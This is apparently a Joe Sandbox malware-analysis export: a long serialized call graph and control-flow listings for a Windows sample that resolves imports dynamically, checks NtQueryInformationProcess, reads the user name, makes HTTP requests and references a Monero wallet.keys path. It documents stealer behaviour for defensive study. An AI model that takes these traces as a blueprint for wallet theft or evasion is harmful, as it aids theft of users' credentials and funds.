14031 7145c0 2 API calls 14030->14031 14032 712fb0 14031->14032 14033 7145c0 2 API calls 14032->14033 14034 712fc9 14033->14034 14035 7145c0 2 API calls 14034->14035 14036 712fe2 14035->14036 14037 7145c0 2 API calls 14036->14037 14038 712ffb 14037->14038 14039 7145c0 2 API calls 14038->14039 14040 713014 14039->14040 14041 7145c0 2 API calls 14040->14041 14042 71302d 14041->14042 14043 7145c0 2 API calls 14042->14043 14044 713046 14043->14044 14045 7145c0 2 API calls 14044->14045 14046 71305f 14045->14046 14047 7145c0 2 API calls 14046->14047 14048 713078 14047->14048 14049 7145c0 2 API calls 14048->14049 14050 713091 14049->14050 14051 7145c0 2 API calls 14050->14051 14052 7130aa 14051->14052 14053 7145c0 2 API calls 14052->14053 14054 7130c3 14053->14054 14055 7145c0 2 API calls 14054->14055 14056 7130dc 14055->14056 14057 7145c0 2 API calls 14056->14057 14058 7130f5 14057->14058 14059 7145c0 2 API calls 14058->14059 14060 71310e 14059->14060 14061 7145c0 2 API calls 14060->14061 14062 713127 14061->14062 14063 7145c0 2 API calls 14062->14063 14064 713140 14063->14064 14065 7145c0 2 API calls 14064->14065 14066 713159 14065->14066 14067 7145c0 2 API calls 14066->14067 14068 713172 14067->14068 14069 7145c0 2 API calls 14068->14069 14070 71318b 14069->14070 14071 7145c0 2 API calls 14070->14071 14072 7131a4 14071->14072 14073 7145c0 2 API calls 14072->14073 14074 7131bd 14073->14074 14075 7145c0 2 API calls 14074->14075 14076 7131d6 14075->14076 14077 7145c0 2 API calls 14076->14077 14078 7131ef 14077->14078 14079 7145c0 2 API calls 14078->14079 14080 713208 14079->14080 14081 7145c0 2 API calls 14080->14081 14082 713221 14081->14082 14083 7145c0 2 API calls 14082->14083 14084 71323a 14083->14084 14085 7145c0 2 API calls 14084->14085 14086 713253 14085->14086 14087 7145c0 2 API calls 14086->14087 14088 71326c 14087->14088 14089 7145c0 2 API calls 14088->14089 14090 713285 14089->14090 14091 7145c0 2 API calls 14090->14091 14092 71329e 14091->14092 14093 7145c0 2 
API calls 14092->14093 14094 7132b7 14093->14094 14095 7145c0 2 API calls 14094->14095 14096 7132d0 14095->14096 14097 7145c0 2 API calls 14096->14097 14098 7132e9 14097->14098 14099 7145c0 2 API calls 14098->14099 14100 713302 14099->14100 14101 7145c0 2 API calls 14100->14101 14102 71331b 14101->14102 14103 7145c0 2 API calls 14102->14103 14104 713334 14103->14104 14105 7145c0 2 API calls 14104->14105 14106 71334d 14105->14106 14107 7145c0 2 API calls 14106->14107 14108 713366 14107->14108 14109 7145c0 2 API calls 14108->14109 14110 71337f 14109->14110 14111 7145c0 2 API calls 14110->14111 14112 713398 14111->14112 14113 7145c0 2 API calls 14112->14113 14114 7133b1 14113->14114 14115 7145c0 2 API calls 14114->14115 14116 7133ca 14115->14116 14117 7145c0 2 API calls 14116->14117 14118 7133e3 14117->14118 14119 7145c0 2 API calls 14118->14119 14120 7133fc 14119->14120 14121 7145c0 2 API calls 14120->14121 14122 713415 14121->14122 14123 7145c0 2 API calls 14122->14123 14124 71342e 14123->14124 14125 7145c0 2 API calls 14124->14125 14126 713447 14125->14126 14127 7145c0 2 API calls 14126->14127 14128 713460 14127->14128 14129 7145c0 2 API calls 14128->14129 14130 713479 14129->14130 14131 7145c0 2 API calls 14130->14131 14132 713492 14131->14132 14133 7145c0 2 API calls 14132->14133 14134 7134ab 14133->14134 14135 7145c0 2 API calls 14134->14135 14136 7134c4 14135->14136 14137 7145c0 2 API calls 14136->14137 14138 7134dd 14137->14138 14139 7145c0 2 API calls 14138->14139 14140 7134f6 14139->14140 14141 7145c0 2 API calls 14140->14141 14142 71350f 14141->14142 14143 7145c0 2 API calls 14142->14143 14144 713528 14143->14144 14145 7145c0 2 API calls 14144->14145 14146 713541 14145->14146 14147 7145c0 2 API calls 14146->14147 14148 71355a 14147->14148 14149 7145c0 2 API calls 14148->14149 14150 713573 14149->14150 14151 7145c0 2 API calls 14150->14151 14152 71358c 14151->14152 14153 7145c0 2 API calls 14152->14153 14154 7135a5 14153->14154 14155 7145c0 2 API calls 
14154->14155 14156 7135be 14155->14156 14157 7145c0 2 API calls 14156->14157 14158 7135d7 14157->14158 14159 7145c0 2 API calls 14158->14159 14160 7135f0 14159->14160 14161 7145c0 2 API calls 14160->14161 14162 713609 14161->14162 14163 7145c0 2 API calls 14162->14163 14164 713622 14163->14164 14165 7145c0 2 API calls 14164->14165 14166 71363b 14165->14166 14167 7145c0 2 API calls 14166->14167 14168 713654 14167->14168 14169 7145c0 2 API calls 14168->14169 14170 71366d 14169->14170 14171 7145c0 2 API calls 14170->14171 14172 713686 14171->14172 14173 7145c0 2 API calls 14172->14173 14174 71369f 14173->14174 14175 7145c0 2 API calls 14174->14175 14176 7136b8 14175->14176 14177 7145c0 2 API calls 14176->14177 14178 7136d1 14177->14178 14179 7145c0 2 API calls 14178->14179 14180 7136ea 14179->14180 14181 7145c0 2 API calls 14180->14181 14182 713703 14181->14182 14183 7145c0 2 API calls 14182->14183 14184 71371c 14183->14184 14185 7145c0 2 API calls 14184->14185 14186 713735 14185->14186 14187 7145c0 2 API calls 14186->14187 14188 71374e 14187->14188 14189 7145c0 2 API calls 14188->14189 14190 713767 14189->14190 14191 7145c0 2 API calls 14190->14191 14192 713780 14191->14192 14193 7145c0 2 API calls 14192->14193 14194 713799 14193->14194 14195 7145c0 2 API calls 14194->14195 14196 7137b2 14195->14196 14197 7145c0 2 API calls 14196->14197 14198 7137cb 14197->14198 14199 7145c0 2 API calls 14198->14199 14200 7137e4 14199->14200 14201 7145c0 2 API calls 14200->14201 14202 7137fd 14201->14202 14203 7145c0 2 API calls 14202->14203 14204 713816 14203->14204 14205 7145c0 2 API calls 14204->14205 14206 71382f 14205->14206 14207 7145c0 2 API calls 14206->14207 14208 713848 14207->14208 14209 7145c0 2 API calls 14208->14209 14210 713861 14209->14210 14211 7145c0 2 API calls 14210->14211 14212 71387a 14211->14212 14213 7145c0 2 API calls 14212->14213 14214 713893 14213->14214 14215 7145c0 2 API calls 14214->14215 14216 7138ac 14215->14216 14217 7145c0 2 API calls 14216->14217 
14218 7138c5 14217->14218 14219 7145c0 2 API calls 14218->14219 14220 7138de 14219->14220 14221 7145c0 2 API calls 14220->14221 14222 7138f7 14221->14222 14223 7145c0 2 API calls 14222->14223 14224 713910 14223->14224 14225 7145c0 2 API calls 14224->14225 14226 713929 14225->14226 14227 7145c0 2 API calls 14226->14227 14228 713942 14227->14228 14229 7145c0 2 API calls 14228->14229 14230 71395b 14229->14230 14231 7145c0 2 API calls 14230->14231 14232 713974 14231->14232 14233 7145c0 2 API calls 14232->14233 14234 71398d 14233->14234 14235 7145c0 2 API calls 14234->14235 14236 7139a6 14235->14236 14237 7145c0 2 API calls 14236->14237 14238 7139bf 14237->14238 14239 7145c0 2 API calls 14238->14239 14240 7139d8 14239->14240 14241 7145c0 2 API calls 14240->14241 14242 7139f1 14241->14242 14243 7145c0 2 API calls 14242->14243 14244 713a0a 14243->14244 14245 7145c0 2 API calls 14244->14245 14246 713a23 14245->14246 14247 7145c0 2 API calls 14246->14247 14248 713a3c 14247->14248 14249 7145c0 2 API calls 14248->14249 14250 713a55 14249->14250 14251 7145c0 2 API calls 14250->14251 14252 713a6e 14251->14252 14253 7145c0 2 API calls 14252->14253 14254 713a87 14253->14254 14255 7145c0 2 API calls 14254->14255 14256 713aa0 14255->14256 14257 7145c0 2 API calls 14256->14257 14258 713ab9 14257->14258 14259 7145c0 2 API calls 14258->14259 14260 713ad2 14259->14260 14261 7145c0 2 API calls 14260->14261 14262 713aeb 14261->14262 14263 7145c0 2 API calls 14262->14263 14264 713b04 14263->14264 14265 7145c0 2 API calls 14264->14265 14266 713b1d 14265->14266 14267 7145c0 2 API calls 14266->14267 14268 713b36 14267->14268 14269 7145c0 2 API calls 14268->14269 14270 713b4f 14269->14270 14271 7145c0 2 API calls 14270->14271 14272 713b68 14271->14272 14273 7145c0 2 API calls 14272->14273 14274 713b81 14273->14274 14275 7145c0 2 API calls 14274->14275 14276 713b9a 14275->14276 14277 7145c0 2 API calls 14276->14277 14278 713bb3 14277->14278 14279 7145c0 2 API calls 14278->14279 14280 713bcc 
14279->14280 14281 7145c0 2 API calls 14280->14281 14282 713be5 14281->14282 14283 7145c0 2 API calls 14282->14283 14284 713bfe 14283->14284 14285 7145c0 2 API calls 14284->14285 14286 713c17 14285->14286 14287 7145c0 2 API calls 14286->14287 14288 713c30 14287->14288 14289 7145c0 2 API calls 14288->14289 14290 713c49 14289->14290 14291 7145c0 2 API calls 14290->14291 14292 713c62 14291->14292 14293 7145c0 2 API calls 14292->14293 14294 713c7b 14293->14294 14295 7145c0 2 API calls 14294->14295 14296 713c94 14295->14296 14297 7145c0 2 API calls 14296->14297 14298 713cad 14297->14298 14299 7145c0 2 API calls 14298->14299 14300 713cc6 14299->14300 14301 7145c0 2 API calls 14300->14301 14302 713cdf 14301->14302 14303 7145c0 2 API calls 14302->14303 14304 713cf8 14303->14304 14305 7145c0 2 API calls 14304->14305 14306 713d11 14305->14306 14307 7145c0 2 API calls 14306->14307 14308 713d2a 14307->14308 14309 7145c0 2 API calls 14308->14309 14310 713d43 14309->14310 14311 7145c0 2 API calls 14310->14311 14312 713d5c 14311->14312 14313 7145c0 2 API calls 14312->14313 14314 713d75 14313->14314 14315 7145c0 2 API calls 14314->14315 14316 713d8e 14315->14316 14317 7145c0 2 API calls 14316->14317 14318 713da7 14317->14318 14319 7145c0 2 API calls 14318->14319 14320 713dc0 14319->14320 14321 7145c0 2 API calls 14320->14321 14322 713dd9 14321->14322 14323 7145c0 2 API calls 14322->14323 14324 713df2 14323->14324 14325 7145c0 2 API calls 14324->14325 14326 713e0b 14325->14326 14327 7145c0 2 API calls 14326->14327 14328 713e24 14327->14328 14329 7145c0 2 API calls 14328->14329 14330 713e3d 14329->14330 14331 7145c0 2 API calls 14330->14331 14332 713e56 14331->14332 14333 7145c0 2 API calls 14332->14333 14334 713e6f 14333->14334 14335 7145c0 2 API calls 14334->14335 14336 713e88 14335->14336 14337 7145c0 2 API calls 14336->14337 14338 713ea1 14337->14338 14339 7145c0 2 API calls 14338->14339 14340 713eba 14339->14340 14341 7145c0 2 API calls 14340->14341 14342 713ed3 14341->14342 
14343 7145c0 2 API calls 14342->14343 14344 713eec 14343->14344 14345 7145c0 2 API calls 14344->14345 14346 713f05 14345->14346 14347 7145c0 2 API calls 14346->14347 14348 713f1e 14347->14348 14349 7145c0 2 API calls 14348->14349 14350 713f37 14349->14350 14351 7145c0 2 API calls 14350->14351 14352 713f50 14351->14352 14353 7145c0 2 API calls 14352->14353 14354 713f69 14353->14354 14355 7145c0 2 API calls 14354->14355 14356 713f82 14355->14356 14357 7145c0 2 API calls 14356->14357 14358 713f9b 14357->14358 14359 7145c0 2 API calls 14358->14359 14360 713fb4 14359->14360 14361 7145c0 2 API calls 14360->14361 14362 713fcd 14361->14362 14363 7145c0 2 API calls 14362->14363 14364 713fe6 14363->14364 14365 7145c0 2 API calls 14364->14365 14366 713fff 14365->14366 14367 7145c0 2 API calls 14366->14367 14368 714018 14367->14368 14369 7145c0 2 API calls 14368->14369 14370 714031 14369->14370 14371 7145c0 2 API calls 14370->14371 14372 71404a 14371->14372 14373 7145c0 2 API calls 14372->14373 14374 714063 14373->14374 14375 7145c0 2 API calls 14374->14375 14376 71407c 14375->14376 14377 7145c0 2 API calls 14376->14377 14378 714095 14377->14378 14379 7145c0 2 API calls 14378->14379 14380 7140ae 14379->14380 14381 7145c0 2 API calls 14380->14381 14382 7140c7 14381->14382 14383 7145c0 2 API calls 14382->14383 14384 7140e0 14383->14384 14385 7145c0 2 API calls 14384->14385 14386 7140f9 14385->14386 14387 7145c0 2 API calls 14386->14387 14388 714112 14387->14388 14389 7145c0 2 API calls 14388->14389 14390 71412b 14389->14390 14391 7145c0 2 API calls 14390->14391 14392 714144 14391->14392 14393 7145c0 2 API calls 14392->14393 14394 71415d 14393->14394 14395 7145c0 2 API calls 14394->14395 14396 714176 14395->14396 14397 7145c0 2 API calls 14396->14397 14398 71418f 14397->14398 14399 7145c0 2 API calls 14398->14399 14400 7141a8 14399->14400 14401 7145c0 2 API calls 14400->14401 14402 7141c1 14401->14402 14403 7145c0 2 API calls 14402->14403 14404 7141da 14403->14404 14405 7145c0 2 
[Serialized call-graph data from the interactive graph viewer omitted: it listed node ids, code addresses and the API names called at each node (lstrcpy, GetProcAddress, StrCmpCA, InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, CryptStringToBinaryA, CryptBinaryToStringA, RegOpenKeyExA, RegQueryValueExA, CreateToolhelp32Snapshot, Process32First/Next, GetVolumeInformationA, GetSystemInfo, GlobalMemoryStatusEx, GetKeyboardLayoutList, LoadLibraryA, VirtualAlloc, among others).]

                                  Control-flow Graph (rendered graph omitted; function at 729860, resolving imports through LoadLibraryA * 5 and GetProcAddress * 21 plus further GetProcAddress calls)
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,01222FF0), ref: 007298A1
                                  • GetProcAddress.KERNEL32(74DD0000,01222F00), ref: 007298BA
                                  • GetProcAddress.KERNEL32(74DD0000,01222ED0), ref: 007298D2
                                  • GetProcAddress.KERNEL32(74DD0000,01222DB0), ref: 007298EA
                                  • GetProcAddress.KERNEL32(74DD0000,01222E70), ref: 00729903
                                  • GetProcAddress.KERNEL32(74DD0000,01229B90), ref: 0072991B
                                  • GetProcAddress.KERNEL32(74DD0000,01217580), ref: 00729933
                                  • GetProcAddress.KERNEL32(74DD0000,012174C0), ref: 0072994C
                                  • GetProcAddress.KERNEL32(74DD0000,01222E28), ref: 00729964
                                  • GetProcAddress.KERNEL32(74DD0000,01222D50), ref: 0072997C
                                  • GetProcAddress.KERNEL32(74DD0000,01222D68), ref: 00729995
                                  • GetProcAddress.KERNEL32(74DD0000,01222E88), ref: 007299AD
                                  • GetProcAddress.KERNEL32(74DD0000,01217660), ref: 007299C5
                                  • GetProcAddress.KERNEL32(74DD0000,01222EB8), ref: 007299DE
                                  • GetProcAddress.KERNEL32(74DD0000,01222EE8), ref: 007299F6
                                  • GetProcAddress.KERNEL32(74DD0000,01217640), ref: 00729A0E
                                  • GetProcAddress.KERNEL32(74DD0000,01222DF8), ref: 00729A27
                                  • GetProcAddress.KERNEL32(74DD0000,01222DC8), ref: 00729A3F
                                  • GetProcAddress.KERNEL32(74DD0000,01217680), ref: 00729A57
                                  • GetProcAddress.KERNEL32(74DD0000,01222DE0), ref: 00729A70
                                  • GetProcAddress.KERNEL32(74DD0000,012175E0), ref: 00729A88
                                  • LoadLibraryA.KERNEL32(01223080,?,00726A00), ref: 00729A9A
                                  • LoadLibraryA.KERNEL32(01223050,?,00726A00), ref: 00729AAB
                                  • LoadLibraryA.KERNEL32(01223098,?,00726A00), ref: 00729ABD
                                  • LoadLibraryA.KERNEL32(012230B0,?,00726A00), ref: 00729ACF
                                  • LoadLibraryA.KERNEL32(01223068,?,00726A00), ref: 00729AE0
                                  • GetProcAddress.KERNEL32(75A70000,012230C8), ref: 00729B02
                                  • GetProcAddress.KERNEL32(75290000,012230E0), ref: 00729B23
                                  • GetProcAddress.KERNEL32(75290000,012230F8), ref: 00729B3B
                                  • GetProcAddress.KERNEL32(75BD0000,01223110), ref: 00729B5D
                                  • GetProcAddress.KERNEL32(75450000,01217520), ref: 00729B7E
                                  • GetProcAddress.KERNEL32(76E90000,01229BB0), ref: 00729B9F
                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00729BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00729BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232

                                  Control-flow Graph (rendered graph omitted; function at 7145c0, calling RtlAllocateHeap and VirtualProtect)
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0071460F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0071479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714683
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628

                                  Control-flow Graph (rendered graph omitted; function at 714880, calling InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile and InternetCloseHandle)
                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00714839
                                    • Part of subcall function 007147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00714849
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00714915
                                  • StrCmpCA.SHLWAPI(?,0122F5C8), ref: 0071493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00714ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00730DDB,00000000,?,?,00000000,?,",00000000,?,0122F6C8), ref: 00714DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00714E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00714E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00714E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00714EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00714EC5
                                  • HttpOpenRequestA.WININET(00000000,0122F668,?,0122E9C8,00000000,00000000,00400100,00000000), ref: 00714B15
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00714ECF
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007111B7), ref: 00727880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00727887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0072789F
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: f9d854a92a159b74c006dd1003d72b02a1d3151d1fb1db7a8524c16ffb986e67
                                  • Instruction ID: 02ea146c48ca9edf55abd9c7560f8d1038df1275685623afe9541a8d25bf0d0e
                                  • Opcode Fuzzy Hash: f9d854a92a159b74c006dd1003d72b02a1d3151d1fb1db7a8524c16ffb986e67
                                  • Instruction Fuzzy Hash: 3DF04FF1D48208ABC714DF99DD49BAEBBB8FB08712F10025AFA05A2680C7781904CBA5
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 7f908905ecad3b0d7e369636e8c0e33bf864fc9b32a8ef7ea3f54f30eb336429
                                  • Instruction ID: 0a63ad6dda716b7a04e5994a91866e702d0144e383447c001fb15aa7e1982a5f
                                  • Opcode Fuzzy Hash: 7f908905ecad3b0d7e369636e8c0e33bf864fc9b32a8ef7ea3f54f30eb336429
                                  • Instruction Fuzzy Hash: 78D05E74D0430CDBCB00DFE1D84A6DDBBB8FB0C312F000658D90562340EA306881CBAA

                                   Control-flow Graph
                                  control_flow_graph 633 729c10-729c1a 634 729c20-72a031 GetProcAddress * 43 633->634 635 72a036-72a0ca LoadLibraryA * 8 633->635 634->635 636 72a146-72a14d 635->636 637 72a0cc-72a141 GetProcAddress * 5 635->637 638 72a153-72a211 GetProcAddress * 8 636->638 639 72a216-72a21d 636->639 637->636 638->639 640 72a298-72a29f 639->640 641 72a21f-72a293 GetProcAddress * 5 639->641 642 72a337-72a33e 640->642 643 72a2a5-72a332 GetProcAddress * 6 640->643 641->640 644 72a344-72a41a GetProcAddress * 9 642->644 645 72a41f-72a426 642->645 643->642 644->645 646 72a4a2-72a4a9 645->646 647 72a428-72a49d GetProcAddress * 5 645->647 648 72a4ab-72a4d7 GetProcAddress * 2 646->648 649 72a4dc-72a4e3 646->649 647->646 648->649 650 72a515-72a51c 649->650 651 72a4e5-72a510 GetProcAddress * 2 649->651 652 72a612-72a619 650->652 653 72a522-72a60d GetProcAddress * 10 650->653 651->650 654 72a61b-72a678 GetProcAddress * 4 652->654 655 72a67d-72a684 652->655 653->652 654->655 656 72a686-72a699 GetProcAddress 655->656 657 72a69e-72a6a5 655->657 656->657 658 72a6a7-72a703 GetProcAddress * 4 657->658 659 72a708-72a709 657->659 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,01217320), ref: 00729C2D
                                  • GetProcAddress.KERNEL32(74DD0000,01217600), ref: 00729C45
                                  • GetProcAddress.KERNEL32(74DD0000,0122A4B8), ref: 00729C5E
                                  • GetProcAddress.KERNEL32(74DD0000,0122A4E8), ref: 00729C76
                                  • GetProcAddress.KERNEL32(74DD0000,0122A350), ref: 00729C8E
                                  • GetProcAddress.KERNEL32(74DD0000,0122A380), ref: 00729CA7
                                  • GetProcAddress.KERNEL32(74DD0000,0121C558), ref: 00729CBF
                                  • GetProcAddress.KERNEL32(74DD0000,0122DB38), ref: 00729CD7
                                  • GetProcAddress.KERNEL32(74DD0000,0122DAD8), ref: 00729CF0
                                  • GetProcAddress.KERNEL32(74DD0000,0122DA48), ref: 00729D08
                                  • GetProcAddress.KERNEL32(74DD0000,0122DA18), ref: 00729D20
                                  • GetProcAddress.KERNEL32(74DD0000,01217340), ref: 00729D39
                                  • GetProcAddress.KERNEL32(74DD0000,012174A0), ref: 00729D51
                                  • GetProcAddress.KERNEL32(74DD0000,01217360), ref: 00729D69
                                  • GetProcAddress.KERNEL32(74DD0000,01217380), ref: 00729D82
                                  • GetProcAddress.KERNEL32(74DD0000,0122D9B8), ref: 00729D9A
                                  • GetProcAddress.KERNEL32(74DD0000,0122DA00), ref: 00729DB2
                                  • GetProcAddress.KERNEL32(74DD0000,0121C5A8), ref: 00729DCB
                                  • GetProcAddress.KERNEL32(74DD0000,012173E0), ref: 00729DE3
                                  • GetProcAddress.KERNEL32(74DD0000,0122DBB0), ref: 00729DFB
                                  • GetProcAddress.KERNEL32(74DD0000,0122DB50), ref: 00729E14
                                  • GetProcAddress.KERNEL32(74DD0000,0122D9E8), ref: 00729E2C
                                  • GetProcAddress.KERNEL32(74DD0000,0122DB80), ref: 00729E44
                                  • GetProcAddress.KERNEL32(74DD0000,01217440), ref: 00729E5D
                                  • GetProcAddress.KERNEL32(74DD0000,0122DA78), ref: 00729E75
                                  • GetProcAddress.KERNEL32(74DD0000,0122DA60), ref: 00729E8D
                                  • GetProcAddress.KERNEL32(74DD0000,0122DAF0), ref: 00729EA6
                                  • GetProcAddress.KERNEL32(74DD0000,0122DC70), ref: 00729EBE
                                  • GetProcAddress.KERNEL32(74DD0000,0122DB98), ref: 00729ED6
                                  • GetProcAddress.KERNEL32(74DD0000,0122DBC8), ref: 00729EEF
                                  • GetProcAddress.KERNEL32(74DD0000,0122DBE0), ref: 00729F07
                                  • GetProcAddress.KERNEL32(74DD0000,0122DB68), ref: 00729F1F
                                  • GetProcAddress.KERNEL32(74DD0000,0122DA90), ref: 00729F38
                                  • GetProcAddress.KERNEL32(74DD0000,0122AF80), ref: 00729F50
                                  • GetProcAddress.KERNEL32(74DD0000,0122DAC0), ref: 00729F68
                                  • GetProcAddress.KERNEL32(74DD0000,0122DBF8), ref: 00729F81
                                  • GetProcAddress.KERNEL32(74DD0000,01217400), ref: 00729F99
                                  • GetProcAddress.KERNEL32(74DD0000,0122DB08), ref: 00729FB1
                                  • GetProcAddress.KERNEL32(74DD0000,01217420), ref: 00729FCA
                                  • GetProcAddress.KERNEL32(74DD0000,0122DC88), ref: 00729FE2
                                  • GetProcAddress.KERNEL32(74DD0000,0122DCA0), ref: 00729FFA
                                  • GetProcAddress.KERNEL32(74DD0000,01217460), ref: 0072A013
                                  • GetProcAddress.KERNEL32(74DD0000,01217A20), ref: 0072A02B
                                  • LoadLibraryA.KERNEL32(0122DB20,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A03D
                                  • LoadLibraryA.KERNEL32(0122DAA8,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A04E
                                  • LoadLibraryA.KERNEL32(0122DC10,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A060
                                  • LoadLibraryA.KERNEL32(0122DC28,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A072
                                  • LoadLibraryA.KERNEL32(0122D9D0,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A083
                                  • LoadLibraryA.KERNEL32(0122DC58,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A095
                                  • LoadLibraryA.KERNEL32(0122DA30,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A0A7
                                  • LoadLibraryA.KERNEL32(0122DC40,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A0B8
